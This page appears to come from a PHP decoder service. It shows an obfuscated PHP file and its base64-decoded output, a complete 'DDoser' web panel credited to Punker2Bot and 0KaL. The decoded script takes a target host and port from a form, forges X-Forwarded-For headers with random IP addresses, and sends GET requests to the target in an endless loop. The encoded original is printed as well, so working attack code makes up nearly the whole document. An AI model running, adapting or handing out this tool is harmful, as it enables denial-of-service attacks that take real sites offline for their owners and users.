Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php // DoS attacker by Punker2Bot Cracked by 0KaL eval("?>" . base64_decode(" PD9w..
Decoded Output download
?>b'<?php
$dominio = addslashes($_POST[\'host\']);
$ruta = addslashes($_POST[\'path\']);
$port = addslashes($_POST[\'port\']);
$poder = addslashes($_POST[\'poder\']);
$pw = addslashes($_POST[\'pw\']);
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="msvalidate.01" content="ECAB4AE09BDECAEDA633439FD8D12D38" />
<meta name="author" content="Punker2Bot (cracked by 0KaL)" />
<title>DDoser attacker by Punker2Bot and cracked by 0KaL</title>
<style>
body { padding: 3px; }
* {
background-color: #1F1F1F;
color: #0EEF57;
font-family: calibri,tahoma,verdana,terminal,serif,lucida,system;
font-size: 18px;
margin: 0; }
input {
width: 440px;
border: solid 1px #00BCFF;
padding: 2px; }
input.accion {
width: 215px;
border: solid 2px #00BCFF;
padding: 3px;
cursor: pointer }
input:hover , input:active { border-color: #FFE900 }
#dinamico {
padding: 3px;
font-size: 13px!important;
height: 300px;
min-height: 300px;
max-height: 300px;
overflow: hidden }
</style>
<script>
function ir_a_bajo() {
var scc = document.getElementById(\'dinamico\');
scc.scrollTop = scc.scrollHeight + scc.offsetHeight;
}
setInterval(\'ir_a_bajo()\',75);
</script>
</head>
<body onload="ir_a_bajo()" id="index">
<form action="" method="post" name="jaja">
<table>
<tr>
<td class="titulo">
Domnio/IP</td> <td><input id="boton" type="text" name="host" value="<?php if($dominio=="") { print \'vitima.com.br\'; } else { print htmlentities($dominio); } ?>" size="40px" ></td>
</tr>
<tr>
<td class="titulo">
Arquivo </td> <td> <input id="boton" type="text" name="path" value="<?php if($ruta=="") { print \'/\'; } else { print htmlentities($ruta); } ?>" size="40px" /> </td>
</tr>
<tr>
<td class="titulo">
Porta </td>
<td>
<select name="port" id="boton">
<option value="80">80 (HTTP)</option>
<option value="443">443 (HTTPS)</option>
<option value="3128">3128 (proxy)</option>
<option value="8080">8080 (proxy)</option>
<option value="1080">1080 (internal proxies)</option>
<option value="2301">2301 (reverse WWW)</option>
</select></td>
</tr>
<tr>
<td class="titulo">
Senha </td>
<td><input id="boton" type="text" disabled name="pw" value="<?php if($pw=="") { print \'0KaL\'; } else { print htmlentities($pw); } ?>" size="40px" /> </td>
</tr>
<tr>
<td class="titulo">
Preparado? </td> <td>
<input type="submit" value="Atacar agora!" class="accion"> <input type="button" value="Cancelar ataque" class="accion" onclick="window.stop()" /> </td>
</tr>
</table>
</form>
<br />
<div id="dinamico">
<?php
@set_time_limit(0);
$msj = array("<h2>No podes continuar, pw erroneo</h2></div></body></html>","<h2>Preencha o formulrio acima com os dados do alvo.</h2></div></body></html>","<big><b>No foi possvel estabelecer uma conexo.</b></big><br />
","0a32e26a417d2c7cfbd333b7feb0a0a8","2e2234a41122a233cfbd333b9bc30a03");
function ddoser($dominio,$ruta,$port) {
//hago un random de ips para no ser siempre el mismo vistitante
$ip_simulada = rand(188,254).\'.\'.rand(1,254).\'.\'.rand(1,254).\'.\'.rand(1,254);
//defino y abro socket segun los datos del form
$socket = fsockopen($dominio, $port, $errno, $errstr, 30);
// comienzan los datos del header para parecer una persona comun xD
$header = "GET ".$ruta." HTTP/1.1
";
$header .= "Host: ".$dominio."
";
$header .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16
";
$header .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,image/jpg,image/gif,*/*;q=0.5
";
$header .= "Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3
";
$header .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
";
$header .= "Keep-Alive: 300
";
$header .= "Proxy-Connection: keep-alive
";
$header .= "Referer: http://".$dominio.$ruta."
";
$header .= "Content-Type: application/x-www-form-urlencoded
";
$header .= "X-Forwarded-For: ".$ip_simulada."
";
$header .= "Via: CB-Prx
";
$header .= "Connection: Close
";
//envio todo lo recolectado
$send_header = fwrite($socket,$header);
//lo muestro en la web
if($send_header) {
print("Attacking as: <span style=\'color:#FF0F2F\'>".$ip_simulada."</span> @ ".htmlentities(str_replace(\'www.\',\'\',$dominio))."".htmlentities($ruta)."<br />
");
} else {
print("$msj[2]");
}
fclose($socket);
}
if($msj[3] != (md5(md5($pw)))) { echo "DDoS script coded by Punker2Bot and cracked by <a href=\'http://0kal.t35.com\' title=\'Website\' target=\'_blank\'>0KaL</a>."; }
if($dominio != "" && $dominio != "www.victima.com") {
while(1) {
ddoser($dominio,$ruta,$port);
}
} else { die ("$msj[1]");}
?>
</div>
</body>
</html><? $el_saludo_es = ""; ?>
'
Did this file decode correctly?
Original Code
<?php
// DoS attacker by Punker2Bot Cracked by 0KaL
eval("?>" . base64_decode("
PD9waHAKJGRvbWluaW8gPSBhZGRzbGFzaGVzKCRfUE9TVFsnaG9zdCddKTsKJHJ1dGEgPSBhZGRzbGFzaGVzKCRfUE9TVFsncGF0aCddKTsKJHBvcnQgPSBhZGRzbGFzaGVzKCRfUE9TVFsncG9ydCddKTsKJHBvZGVyID0gYWRkc2xhc2hlcygkX1BPU1RbJ3BvZGVyJ10pOwokcHcgPSBhZGRzbGFzaGVzKCRfUE9TVFsncHcnXSk7Cj8+CjwhRE9DVFlQRSBodG1sIFBVQkxJQyAiLS8vVzNDLy9EVEQgWEhUTUwgMS4wIFRyYW5zaXRpb25hbC8vRU4iICJodHRwOi8vd3d3LnczLm9yZy9UUi94aHRtbDEvRFREL3hodG1sMS10cmFuc2l0aW9uYWwuZHRkIj4KPGh0bWwgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiIHhtbDpsYW5nPSJlbiI+CjxoZWFkPgo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LVR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCIgLz4KPG1ldGEgbmFtZT0ibXN2YWxpZGF0ZS4wMSIgY29udGVudD0iRUNBQjRBRTA5QkRFQ0FFREE2MzM0MzlGRDhEMTJEMzgiIC8+CjxtZXRhIG5hbWU9ImF1dGhvciIgY29udGVudD0iUHVua2VyMkJvdCAoY3JhY2tlZCBieSAwS2FMKSIgLz4KPHRpdGxlPkREb3NlciBhdHRhY2tlciBieSBQdW5rZXIyQm90IGFuZCBjcmFja2VkIGJ5IDBLYUw8L3RpdGxlPgo8c3R5bGU+CmJvZHkgeyBwYWRkaW5nOiAzcHg7IH0KCiogewpiYWNrZ3JvdW5kLWNvbG9yOiAjMUYxRjFGOwpjb2xvcjogIzBFRUY1NzsKZm9udC1mYW1pbHk6IGNhbGlicmksdGFob21hLHZlcmRhbmEsdGVybWluYWwsc2VyaWYsbHVjaWRhLHN5c3RlbTsKZm9udC1zaXplOiAxOHB4OwptYXJnaW46IDA7IH0KCmlucHV0IHsKd2lkdGg6IDQ0MHB4Owpib3JkZXI6IHNvbGlkIDFweCAjMDBCQ0ZGOwpwYWRkaW5nOiAycHg7IH0KCmlucHV0LmFjY2lvbiB7CndpZHRoOiAyMTVweDsKYm9yZGVyOiBzb2xpZCAycHggIzAwQkNGRjsKcGFkZGluZzogM3B4OwpjdXJzb3I6IHBvaW50ZXIgfQoKaW5wdXQ6aG92ZXIgLCBpbnB1dDphY3RpdmUgeyBib3JkZXItY29sb3I6ICNGRkU5MDAgfQoKI2RpbmFtaWNvIHsKcGFkZGluZzogM3B4Owpmb250LXNpemU6IDEzcHghaW1wb3J0YW50OwpoZWlnaHQ6IDMwMHB4OwptaW4taGVpZ2h0OiAzMDBweDsKbWF4LWhlaWdodDogMzAwcHg7Cm92ZXJmbG93OiBoaWRkZW4gfQo8L3N0eWxlPgo8c2NyaXB0PgpmdW5jdGlvbiBpcl9hX2Jham8oKSB7CnZhciBzY2MgPSBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnZGluYW1pY28nKTsKc2NjLnNjcm9sbFRvcCA9IHNjYy5zY3JvbGxIZWlnaHQgKyBzY2Mub2Zmc2V0SGVpZ2h0Owp9CnNldEludGVydmFsKCdpcl9hX2Jham8oKScsNzUpOwo8L3NjcmlwdD4KPC9oZWFkPgo8Ym9keSBvbmxvYWQ9ImlyX2FfYmFqbygpIiBpZD0iaW5kZXgiPgo8Zm9ybSBhY3Rpb249IiIgbWV0aG9kPSJwb3N0IiBuYW1lPSJqYWphIj4KPHRhYmxlPgo8dHI+Cjx0ZCBjbGFzcz0idGl0dWxvIj4KRG9tw61uaW8vSVA8L3RkPiA8dGQ+PGlucHV0IGlkPSJib3RvbiIgdHlwZT0idGV4dCIgbmFtZT0iaG9zdCIgdmFsdWU9Ijw/cGhwIGlmKCRkb21pbmlvPT0iIikgeyBwcmludCAndml0aW1hLmNvbS5icic7IH0gZWxzZSB7IHByaW50IGh0bWxlbnRpdGllcygkZG9taW5pbyk7IH0gPz4iIHNpemU9IjQwcHgiID48L3RkPgo8L3RyPgo8dHI+Cjx0ZCBjbGFzcz0idGl0dWxvIj4KQXJxdWl2byA8L3RkPiA8dGQ+IDxpbnB1dCBpZD0iYm90b24iIHR5cGU9InRleHQiIG5hbWU9InBhdGgiIHZhbHVlPSI8P3BocCBpZigkcnV0YT09IiIpIHsgcHJpbnQgJy8nOyB9IGVsc2UgeyBwcmludCBodG1sZW50aXRpZXMoJHJ1dGEpOyB9ID8+IiBzaXplPSI0MHB4IiAvPiA8L3RkPgo8L3RyPgo8dHI+Cjx0ZCBjbGFzcz0idGl0dWxvIj4KUG9ydGEgPC90ZD4KPHRkPgo8c2VsZWN0IG5hbWU9InBvcnQiIGlkPSJib3RvbiI+CjxvcHRpb24gdmFsdWU9IjgwIj44MCAoSFRUUCk8L29wdGlvbj4KPG9wdGlvbiB2YWx1ZT0iNDQzIj40NDMgKEhUVFBTKTwvb3B0aW9uPgo8b3B0aW9uIHZhbHVlPSIzMTI4Ij4zMTI4IChwcm94eSk8L29wdGlvbj4KPG9wdGlvbiB2YWx1ZT0iODA4MCI+ODA4MCAocHJveHkpPC9vcHRpb24+CjxvcHRpb24gdmFsdWU9IjEwODAiPjEwODAgKGludGVybmFsIHByb3hpZXMpPC9vcHRpb24+CjxvcHRpb24gdmFsdWU9IjIzMDEiPjIzMDEgKHJldmVyc2UgV1dXKTwvb3B0aW9uPgo8L3NlbGVjdD48L3RkPgo8L3RyPgo8dHI+Cjx0ZCBjbGFzcz0idGl0dWxvIj4KU2VuaGEgPC90ZD4KPHRkPjxpbnB1dCBpZD0iYm90b24iIHR5cGU9InRleHQiIGRpc2FibGVkIG5hbWU9InB3IiB2YWx1ZT0iPD9waHAgaWYoJHB3PT0iIikgeyBwcmludCAnMEthTCc7IH0gZWxzZSB7IHByaW50IGh0bWxlbnRpdGllcygkcHcpOyB9ID8+IiBzaXplPSI0MHB4IiAvPiA8L3RkPgo8L3RyPgo8dHI+Cjx0ZCBjbGFzcz0idGl0dWxvIj4KUHJlcGFyYWRvPyA8L3RkPiA8dGQ+CjxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJBdGFjYXIgYWdvcmEhIiBjbGFzcz0iYWNjaW9uIj4gJm5ic3A7IDxpbnB1dCB0eXBlPSJidXR0b24iIHZhbHVlPSJDYW5jZWxhciBhdGFxdWUiIGNsYXNzPSJhY2Npb24iIG9uY2xpY2s9IndpbmRvdy5zdG9wKCkiIC8+IDwvdGQ+CjwvdHI+CjwvdGFibGU+CjwvZm9ybT4KPGJyIC8+CjxkaXYgaWQ9ImRpbmFtaWNvIj4KPD9waHAKQHNldF90aW1lX2xpbWl0KDApOwokbXNqID0gYXJyYXkoIjxoMj5ObyBwb2RlcyBjb250aW51YXIsIHB3IGVycm9uZW88L2gyPjwvZGl2PjwvYm9keT48L2h0bWw+IiwiPGgyPlByZWVuY2hhIG8gZm9ybXVsw6FyaW8gYWNpbWEgY29tIG9zIGRhZG9zIGRvIGFsdm8uPC9oMj48L2Rpdj48L2JvZHk+PC9odG1sPiIsIjxiaWc+PGI+TsOjbyBmb2kgcG9zc8OtdmVsIGVzdGFiZWxlY2VyIHVtYSBjb25leMOjby48L2I+PC9iaWc+PGJyIC8+XG4iLCIwYTMyZTI2YTQxN2QyYzdjZmJkMzMzYjdmZWIwYTBhOCIsIjJlMjIzNGE0MTEyMmEyMzNjZmJkMzMzYjliYzMwYTAzIik7CgpmdW5jdGlvbiBkZG9zZXIoJGRvbWluaW8sJHJ1dGEsJHBvcnQpIHsKCi8vaGFnbyB1biByYW5kb20gZGUgaXBzIHBhcmEgbm8gc2VyIHNpZW1wcmUgZWwgbWlzbW8gdmlzdGl0YW50ZQokaXBfc2ltdWxhZGEgPSByYW5kKDE4OCwyNTQpLicuJy5yYW5kKDEsMjU0KS4nLicucmFuZCgxLDI1NCkuJy4nLnJhbmQoMSwyNTQpOwoKLy9kZWZpbm8geSBhYnJvIHNvY2tldCBzZWd1biBsb3MgZGF0b3MgZGVsIGZvcm0KJHNvY2tldCA9IGZzb2Nrb3BlbigkZG9taW5pbywgJHBvcnQsICRlcnJubywgJGVycnN0ciwgMzApOwoKLy8gY29taWVuemFuIGxvcyBkYXRvcyBkZWwgaGVhZGVyIHBhcmEgcGFyZWNlciB1bmEgcGVyc29uYSBjb211biB4RAokaGVhZGVyID0gIkdFVCAiLiRydXRhLiIgSFRUUC8xLjFcclxuIjsKJGhlYWRlciAuPSAiSG9zdDogIi4kZG9taW5pby4iXHJcbiI7CiRoZWFkZXIgLj0gIlVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChXaW5kb3dzOyBVOyBXaW5kb3dzIE5UIDUuMTsgZXMtRVM7IHJ2OjEuOC4xLjE2KSBHZWNrby8yMDA4MDcwMiBGaXJlZm94LzIuMC4wLjE2XHJcbiI7CiRoZWFkZXIgLj0gIkFjY2VwdDogdGV4dC94bWwsYXBwbGljYXRpb24veG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCx0ZXh0L2h0bWw7cT0wLjksdGV4dC9wbGFpbjtxPTAuOCxpbWFnZS9wbmcsaW1hZ2UvanBnLGltYWdlL2dpZiwqLyo7cT0wLjVcclxuIjsKJGhlYWRlciAuPSAiQWNjZXB0LUxhbmd1YWdlOiBlcy1lcyxlcztxPTAuOCxlbi11cztxPTAuNSxlbjtxPTAuM1xyXG4iOwokaGVhZGVyIC49ICJBY2NlcHQtQ2hhcnNldDogSVNPLTg4NTktMSx1dGYtODtxPTAuNywqO3E9MC43XHJcbiI7CiRoZWFkZXIgLj0gIktlZXAtQWxpdmU6IDMwMFxyXG4iOwokaGVhZGVyIC49ICJQcm94eS1Db25uZWN0aW9uOiBrZWVwLWFsaXZlXHJcbiI7CiRoZWFkZXIgLj0gIlJlZmVyZXI6IGh0dHA6Ly8iLiRkb21pbmlvLiRydXRhLiJcclxuIjsKJGhlYWRlciAuPSAiQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWRcclxuIjsKJGhlYWRlciAuPSAiWC1Gb3J3YXJkZWQtRm9yOiAiLiRpcF9zaW11bGFkYS4iXHJcbiI7CiRoZWFkZXIgLj0gIlZpYTogQ0ItUHJ4XHJcbiI7CiRoZWFkZXIgLj0gIkNvbm5lY3Rpb246IENsb3NlXHJcblxyXG4iOwoKLy9lbnZpbyB0b2RvIGxvIHJlY29sZWN0YWRvCiRzZW5kX2hlYWRlciA9IGZ3cml0ZSgkc29ja2V0LCRoZWFkZXIpOwoKLy9sbyBtdWVzdHJvIGVuIGxhIHdlYgppZigkc2VuZF9oZWFkZXIpIHsKcHJpbnQoIkF0dGFja2luZyBhczogPHNwYW4gc3R5bGU9J2NvbG9yOiNGRjBGMkYnPiIuJGlwX3NpbXVsYWRhLiI8L3NwYW4+IEAgIi5odG1sZW50aXRpZXMoc3RyX3JlcGxhY2UoJ3d3dy4nLCcnLCRkb21pbmlvKSkuIiIuaHRtbGVudGl0aWVzKCRydXRhKS4iPGJyIC8+XG4iKTsKfSBlbHNlIHsKcHJpbnQoIiRtc2pbMl0iKTsKfQpmY2xvc2UoJHNvY2tldCk7Cn0KaWYoJG1zalszXSAhPSAobWQ1KG1kNSgkcHcpKSkpIHsgZWNobyAiRERvUyBzY3JpcHQgY29kZWQgYnkgUHVua2VyMkJvdCBhbmQgY3JhY2tlZCBieSA8YSBocmVmPSdodHRwOi8vMGthbC50MzUuY29tJyB0aXRsZT0nV2Vic2l0ZScgdGFyZ2V0PSdfYmxhbmsnPjBLYUw8L2E+LiI7IH0KaWYoJGRvbWluaW8gIT0gIiIgJiYgJGRvbWluaW8gIT0gInd3dy52aWN0aW1hLmNvbSIpIHsKd2hpbGUoMSkgewpkZG9zZXIoJGRvbWluaW8sJHJ1dGEsJHBvcnQpOwp9Cn0gZWxzZSB7IGRpZSAoIiRtc2pbMV0iKTt9Cj8+CjwvZGl2Pgo8L2JvZHk+CjwvaHRtbD48PyAkZWxfc2FsdWRvX2VzID0gIiI7ID8+Cg=="));
?>
Function Calls
base64_decode | 1 |
Stats
MD5 | c573633f8014c7108745fea5e6736e59 |
Eval Count | 1 |
Decode Time | 78 ms |